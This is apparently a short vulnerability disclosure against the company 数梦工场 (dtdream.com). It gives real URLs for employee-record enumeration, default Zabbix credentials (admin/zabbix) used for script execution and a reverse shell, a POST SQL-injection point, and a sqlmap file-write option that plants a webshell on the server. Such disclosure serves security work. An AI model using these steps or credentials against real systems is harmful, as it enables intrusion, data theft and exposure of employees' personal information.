欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

数梦工场科技漏洞一枚(员工信息遍历/SQL注入getshell/反弹内网)

程序员文章站 2022-06-23 11:49:01
数梦工场位于美丽的云栖小镇.西湖区.杭州。数梦工场基于阿里飞天平台为各行业做云计算和大数据的场景化开发和服务。 我们的愿景是用最卓越的数据技术, 去实现最美好的梦想。 我们钟爱有执行力、有...

数梦工场位于美丽的云栖小镇.西湖区.杭州。数梦工场基于阿里飞天平台为各行业做云计算和大数据的场景化开发和服务。

我们的愿景是用最卓越的数据技术, 去实现最美好的梦想。

我们钟爱有执行力、有想法、有故事、甚至想拯救世界的你,不管是什么,只要有梦想,何不来同我们玩耍,一起用数据技术做点有意义的事情。

数梦工场

1、

员工信息遍历

http://www.dtdream.com/pub/e_card/00001.html

 

数梦工场科技漏洞一枚(员工信息遍历/SQL注入getshell/反弹内网)

 

ceo信息 然后只有00001~09999遍历即可

2、

zabbix

http://monitor.dtdream.com

guest 未禁用

admin/zabbix 默认口令

添加脚本 执行下:

 

数梦工场科技漏洞一枚(员工信息遍历/SQL注入getshell/反弹内网)

 

 

数梦工场科技漏洞一枚(员工信息遍历/SQL注入getshell/反弹内网)

 

 

数梦工场科技漏洞一枚(员工信息遍历/SQL注入getshell/反弹内网)

 

可以直接反弹 创业不易 不深入先

3、

SQL注入 getshell

http://pms.dtdream.com/coop/login/loginProcess/ investor_pwd=1&investor_name=1

POST注入

web application technology: PHP 5.4.45, Nginx

back-end DBMS: MySQL >= 5.0.0

有http://pms.dtdream.com/test.php 有了路径

直接

--file-write "./t.php" --file-dest "/var/www/html/t.php"

写shell

 

数梦工场科技漏洞一枚(员工信息遍历/SQL注入getshell/反弹内网)

 

ok

先这样.

rt

解决方案: